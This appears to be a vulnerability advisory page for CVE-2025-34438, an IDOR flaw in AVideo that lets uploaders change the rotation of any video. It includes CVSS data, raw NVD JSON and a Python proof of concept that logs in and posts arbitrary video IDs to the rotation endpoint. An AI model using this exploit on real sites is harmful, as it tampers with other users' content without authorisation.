CVE-2025-34438

Description

AVideo versions prior to 20.1 contain an insecure direct object reference vulnerability allowing users with upload permissions to modify the rotation metadata of any video. The endpoint verifies upload capability but fails to enforce ownership or management rights for the targeted video.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE

AVideo < 20.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-34438 PoC - AVideo IDOR Video Rotation Modification
# Target: AVideo < 20.1

TARGET_URL = "http://target-avideo.com"
LOGIN_URL = f"{TARGET_URL}/login"
ROTATION_API = f"{TARGET_URL}/api/videoRotate"

def exploit_video_rotation(target_video_id, rotation_angle):
    """
    Exploit IDOR vulnerability to modify any video's rotation metadata
    
    Args:
        target_video_id: ID of the target video to modify
        rotation_angle: Rotation angle (0, 90, 180, 270)
    """
    session = requests.Session()
    
    # Step 1: Authenticate with low-privilege user (upload permission required)
    login_data = {
        "user": "attacker_username",
        "pass": "attacker_password"
    }
    session.post(LOGIN_URL, data=login_data)
    
    # Step 2: Exploit IDOR - modify rotation of ANY video
    rotation_payload = {
        "videos_id": target_video_id,  # IDOR: No ownership check
        "rotation": rotation_angle,
        "type": "rotate"
    }
    
    response = session.post(ROTATION_API, json=rotation_payload)
    
    if response.status_code == 200:
        print(f"[+] Successfully modified video {target_video_id} rotation to {rotation_angle} degrees")
        return True
    else:
        print(f"[-] Exploitation failed")
        return False

if __name__ == "__main__":
    # Example: Rotate video with ID 123 to 90 degrees
    exploit_video_rotation(123, 90)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-34438
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-34438
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-34438/
[4] VulDB https://vuldb.com/cve/CVE-2025-34438
[5] https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/
[6] https://github.com/WWBN/AVideo/commit/4a53ab2056
[7] https://github.com/WWBN/AVideo/commit/c2feaf25cb
[8] https://www.vulncheck.com/advisories/avideo-idor-arbirary-video-rotation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-34438", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:54.283", "lastModified": "2025-12-19T19:15:51.367", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 contain an insecure direct object reference vulnerability allowing users with upload permissions to modify the rotation metadata of any video. The endpoint verifies upload capability but fails to enforce ownership or management rights for the targeted video."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/c2feaf25cb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-idor-arbirary-video-rotation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}